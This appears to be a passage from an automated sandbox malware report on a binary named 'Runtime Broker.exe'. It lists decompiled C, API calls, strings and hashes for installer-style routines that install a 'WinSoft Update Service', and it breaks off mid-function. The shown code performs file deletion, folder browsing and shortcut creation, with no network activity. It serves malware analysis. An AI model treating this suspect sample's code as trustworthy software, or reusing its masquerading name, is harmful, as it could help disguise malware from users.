0x004049d9
0x004049e2
0x004049ef
0x004049ef
0x004049f6
0x004049fc
0x00404a05
0x00404a08
0x00404a0b
0x00404a13
0x00404a16
0x00404a19
0x00404a1f
0x00404a26
0x00404a2d
0x00404cc4
0x00404cd6
0x00404a33
0x00404a36
0x00000000
0x00404a36
0x00404a2d

APIs

GetDlgItem.USER32 ref: 004049D2
SetWindowTextW.USER32(00000000,?), ref: 004049FC
SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
CoTaskMemFree.OLE32(00000000), ref: 00404AB8
lstrcmpiW.KERNEL32(markers.py,00423748,00000000,?,?), ref: 00404AEA
lstrcatW.KERNEL32(?,markers.py), ref: 00404AF6
SetDlgItemTextW.USER32 ref: 00404B08

Part of subcall function 00405B86: GetDlgItemTextW.USER32 ref: 00405B99

Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Runtime Broker.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
Part of subcall function 004067EB: CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Runtime Broker.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
Part of subcall function 004067EB: CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Runtime Broker.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6

Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
Part of subcall function 00404D3F: SetDlgItemTextW.USER32 ref: 00404DFC

Strings

H7B, xrefs: 00404A80
A, xrefs: 00404AA6
markers.py, xrefs: 00404AE4, 00404AE9, 00404AF4
C:\Program Files (x86)\WinSoft Update Service, xrefs: 00404AD3

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Program Files (x86)\WinSoft Update Service$H7B$markers.py
API String ID: 2624150263-356842759
Opcode ID: 83ae3fbfb63e7b455576b8aada3752b90d41a1be7a9e86eb6c517827e269a7ee
Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
Opcode Fuzzy Hash: 83ae3fbfb63e7b455576b8aada3752b90d41a1be7a9e86eb6c517827e269a7ee
Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C4E, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405C4E(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F19(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a308 =  *0x42a308 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653C(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E5D(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653C(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C06(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004055A4(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a308 =  *0x42a308 + 1;
										} else {
											E004055A4(0xfffffff1, _t68);
											E00406302(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C4E(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040689A(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E11(_t68);
							_t38 = E00405C06(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004055A4(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004055A4(0xfffffff1, _t68);
							return E00406302(_t67, _t68, 0);
						}
						L30:
						 *0x42a308 =  *0x42a308 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c58
0x00405c5d
0x00405c66
0x00405c69
0x00405c71
0x00405c74
0x00405c77
0x00405c7f
0x00405c81
0x00405c82
0x00000000
0x00405c82
0x00405c8d
0x00405c90
0x00405c90
0x00405c90
0x00405c94
0x00405ca7
0x00405cae
0x00405cb3
0x00405cb7
0x00405cc7
0x00405cb9
0x00405cbf
0x00405cbf
0x00405ccc
0x00405cd0
0x00405cdc
0x00405ce2
0x00405ce7
0x00405ced
0x00405cf8
0x00405cfe
0x00405d00
0x00405d03
0x00405dad
0x00405dad
0x00405db1
0x00405db3
0x00405db3
0x00405db3
0x00405db3
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d09
0x00405d09
0x00405d09
0x00405d11
0x00405d31
0x00405d39
0x00405d3e
0x00405d45
0x00405d60
0x00405d65
0x00405d67
0x00405d8b
0x00405d69
0x00405d69
0x00405d6c
0x00405d80
0x00405d6e
0x00405d71
0x00405d79
0x00405d79
0x00405d6c
0x00405d47
0x00405d4d
0x00405d4f
0x00405d55
0x00405d55
0x00405d4f
0x00000000
0x00405d45
0x00405d13
0x00405d1b
0x00000000
0x00000000
0x00405d1d
0x00405d25
0x00000000
0x00000000
0x00405d27
0x00405d2f
0x00000000
0x00000000
0x00000000
0x00405d90
0x00405d98
0x00405d9e
0x00405d9e
0x00405da7
0x00000000
0x00405da7
0x00405cd2
0x00405cda
0x00000000
0x00000000
0x00000000
0x00405c96
0x00405c96
0x00405c98
0x00405db8
0x00405dba
0x00405dbd
0x00405e0e
0x00405e0e
0x00405e0e
0x00405dbf
0x00405dc2
0x00405dcd
0x00405dd2
0x00405dd4
0x00000000
0x00000000
0x00405dd7
0x00405de3
0x00405de8
0x00405dea
0x00000000
0x00405e05
0x00405dec
0x00405def
0x00000000
0x00000000
0x00405df4
0x00000000
0x00405dfb
0x00405dc4
0x00405dc4
0x00000000
0x00405dc4
0x00405c9e
0x00405ca1
0x00000000
0x00000000
0x00000000
0x00405ca1

APIs

DeleteFileW.KERNEL32(?,?,73BCFAA0,73BCF560,00000000), ref: 00405C77
lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CE8
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CF8
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
FindClose.KERNEL32(00000000), ref: 00405DA7

Strings

\*.*, xrefs: 00405CB9
PWB, xrefs: 00405CA7
"C:\Users\user\Desktop\Runtime Broker.exe" , xrefs: 00405C4E

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Runtime Broker.exe" $PWB$\*.*
API String ID: 2035342205-1462009089
Opcode ID: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
Opcode Fuzzy Hash: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004021A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021A2(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402D3E(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402D3E(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402D3E(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402D3E(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402D3E(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E88( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402D3E(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Program Files (x86)\\WinSoft Update Service\\Lib\\site-packages\\pip\\_vendor\\distlib");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021ab
0x004021b5
0x004021bf
0x004021c9
0x004021d4
0x004021d7
0x004021f1
0x004021f4
0x004021fa
0x004021fd
0x00402207
0x0040220b
0x0040220b
0x00402210
0x00402221
0x00402229
0x004022e0
0x004022e0
0x004022e7
0x0040222f
0x0040222f
0x0040223e
0x00402242
0x00402245
0x0040224b
0x00402259
0x0040225c
0x0040225e
0x00402269
0x00402269
0x0040226e
0x00402270
0x00402277
0x00402277
0x0040227a
0x00402283
0x00402286
0x0040228c
0x0040228e
0x00402298
0x00402298
0x0040229b
0x004022a4
0x004022a7
0x004022b0
0x004022b6
0x004022b8
0x004022c6
0x004022c6
0x004022c9
0x004022cf
0x004022cf
0x004022d2
0x004022d8
0x004022de
0x004022f3
0x00000000
0x00000000
0x00000000
0x004022de
0x004022e9
0x00402bc5
0x00402bd1

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221

Strings

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib, xrefs: 00402261

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib
API String ID: 542301482-3629606024
Opcode ID: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
Opcode Fuzzy Hash: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402902, Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402902(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402D3E(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406483( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653C();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040291a
0x00402935
0x00402940
0x00402941
0x00402a7b
0x0040291c
0x0040291f
0x00402922
0x00402925
0x00402925
0x00402bc5
0x00402bd1

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
Opcode Fuzzy Hash: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404EFF, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404EFF(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				int _v32;
				void* _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t191;
				signed int _t203;
				void* _t206;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t249;
				signed int _t251;
				signed char _t252;
				signed char _t260;
				void* _t265;
				void* _t267;
				signed char* _t285;
				signed char _t286;
				long _t291;
				void* _t298;
				signed int* _t299;
				int _t300;
				long _t301;
				int _t303;
				long _t304;
				int _t305;
				signed int _t306;
				signed int _t309;
				signed int _t316;
				signed char* _t324;
				int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t191 = GetDlgItem(_a4, 0x408);
				_t298 =  *0x42a2a8;
				_t331 = SendMessageW;
				_v8 = _t191;
				_v36 = _t298;
				_v24 =  *0x42a274 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t307 = _a16;
					} else {
						_a12 = 0;
						_t307 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t307;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
							if(( *0x42a27d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t307 = 0 | _a8 != 0x00000413;
								_t249 = E00404E4D(_v8, _a8 != 0x413);
								_v20 = _t249;
								if(_t249 >= 0) {
									_t100 = _t298 + 8; // 0x8
									_t307 = _t249 * 0x818 + _t100;
									_t251 =  *_t307;
									if((_t251 & 0x00000010) == 0) {
										if((_t251 & 0x00000040) == 0) {
											_t252 = _t251 ^ 0x00000001;
										} else {
											_t260 = _t251 ^ 0x00000080;
											if(_t260 >= 0) {
												_t252 = _t260 & 0x000000fe;
											} else {
												_t252 = _t260 | 0x00000001;
											}
										}
										 *_t307 = _t252;
										E0040117D(_v20);
										_a8 = 0x40f;
										_a12 = _v20 + 1;
										_a16 =  !( *0x42a27c) >> 0x00000008 & 0x00000001;
									}
								}
								goto L41;
							}
							_t307 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42372c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x423740;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2e0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a27d & 0x00000001) != 0) {
									_t329 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t329);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
								}
								goto L93;
							} else {
								E004011EF(_t307, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404ECD();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t307, 0, 0);
									_v36 =  *0x423740;
									_t206 =  *0x42a2a8;
									_v64 = 0xf030;
									_v20 = 0;
									if( *0x42a2ac <= 0) {
										L86:
										if( *0x42a26c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404E08(0x3ff, 0xfffffffb, E00404E20(5));
										}
										goto L90;
									}
									_t299 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
										if(_t212 != 0) {
											_t309 =  *_t299;
											_v72 = _t212;
											_v76 = 8;
											if((_t309 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t299[4]);
												_t299[0] = _t299[0] & 0x000000fe;
											}
											if((_t309 & 0x00000040) == 0) {
												_t216 = (_t309 & 0x00000001) + 1;
												if((_t309 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v20 = _v20 + 1;
										_t299 =  &(_t299[0x206]);
									} while (_v20 <  *0x42a2ac);
									goto L86;
								} else {
									_t300 = E004012E2( *0x423740);
									E00401299(_t300);
									_t227 = 0;
									_t307 = 0;
									if(_t300 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t307, 0);
										_a16 = _t300;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
											_t307 = _t307 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t300);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
								_t301 = 0x20;
							}
							E00401299(_t301);
							SendMessageW(_a4, 0x420, 0, _t301);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42a2e0 = _a4;
					_t303 = 2;
					_v32 = 0;
					_v20 = _t303;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a2ac << 2);
					_t265 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_v16 = _t265;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E00405518);
					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t267;
					ImageList_AddMasked(_t267, _v16, 0xff00ff);
					SendMessageW(_v8, 0x1109, _t303,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v16);
					_t304 = 0;
					do {
						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
							if(_t304 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406579(_t304, 0, _t331, 0, _t273)), _t304);
						}
						_t304 = _t304 + 1;
					} while (_t304 < 0x21);
					_t305 = _a16;
					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404492(_a4);
					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404492(_a4);
					_t306 = 0;
					_v16 = 0;
					if( *0x42a2ac <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t324 = _v36 + 8;
						_v28 = _t324;
						do {
							_t285 =  &(_t324[0x10]);
							if( *_t285 != 0) {
								_v64 = _t285;
								_t286 =  *_t324;
								_v88 = _v16;
								_t316 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t316;
								_v44 = _t306;
								_v72 = _t286 & _t316;
								if((_t286 & 0x00000002) == 0) {
									if((_t286 & 0x00000004) == 0) {
